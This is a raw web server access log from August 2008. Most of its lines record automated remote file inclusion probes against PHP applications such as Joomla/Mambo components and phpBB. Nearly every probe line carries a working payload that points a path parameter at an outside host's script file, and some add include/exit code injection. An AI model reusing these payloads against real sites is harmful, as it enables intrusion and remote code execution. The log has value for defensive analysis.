202.70.83.4 - - [12/Aug/2008:09:15:50 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:15:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:15:57 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:16:23 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:16:24 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:16:24 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:16:34 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:16:34 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:16:35 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:16:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
75.60.38.162 - - [12/Aug/2008:09:16:36 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:16:51 -0700] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:16:51 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:16:52 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:17:09 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:17:10 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:17:10 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:17:14 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:17:35 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:17:44 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:17:44 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:17:44 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:17:45 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:17:48 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=:http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:50 -0700] "GET /logs/access_080124.log//oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:50 -0700] "GET /logs/access_080124.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:51 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:51 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:51 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:51 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
222.237.78.125 - - [12/Aug/2008:09:17:53 -0700] "GET /logs/access_080103.log//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Aug/2008:09:17:53 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Aug/2008:09:17:53 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:17:54 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:54 -0700] "GET /logs/access_080219.log//oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:09:17:55 -0700] "GET /logs/access_080219.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:17:56 -0700] "GET /logs/access_080125.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.237.78.125 - - [12/Aug/2008:09:18:19 -0700] "GET /logs/access_080120.log//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:18:26 -0700] "GET /logs/modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:18:26 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:18:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:18:38 -0700] "GET /logs/modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:18:39 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:18:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:18:39 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:18:40 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:18:40 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:18:40 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:18:42 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18607 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:18:43 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:18:52 -0700] "GET /logs/access_080218.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:19:02 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:19:02 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.178.37.115 - - [12/Aug/2008:09:19:08 -0700] "GET /logs/access_080131.log/scanhttp://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:10 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:10 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:10 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.22.204.187 - - [12/Aug/2008:09:19:18 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:19:35 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:19:35 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:19:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:19:36 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [12/Aug/2008:09:19:39 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
207.44.248.82 - - [12/Aug/2008:09:19:47 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:49 -0700] "GET /logs/access_080121.log//plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:49 -0700] "GET //plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:50 -0700] "GET /logs//plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:19:57 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:19:57 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:59 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:59 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:19:59 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:20:08 -0700] "GET /logs/access_080119.log//plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.248.82 - - [12/Aug/2008:09:20:10 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:20:14 -0700] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:20:34 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:20:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:20:36 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:20:38 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.172.212.2 - - [12/Aug/2008:09:20:45 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
204.28.3.51 - - [12/Aug/2008:09:20:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.0" 200 344118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:20:49 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:20:49 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:20:50 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:20:50 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:20:53 -0700] "GET /logs//citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:20:53 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:20:55 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 200 18639 "-" "libwww-perl/5.65" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:20:55 -0700] "GET //citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:20:55 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:20:55 -0700] "GET /logs/access_080321.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:21:01 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:21:06 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.74.24 - - [12/Aug/2008:09:21:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:21:27 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:21:32 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:21:34 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:21:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:21:53 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:21:53 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:21:57 -0700] "GET /logs/access_080329.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:22:12 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:22:14 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:22:18 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:22:18 -0700] "GET /logs/modules/global/inc/content.inc.php?sIncPath=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:22:19 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
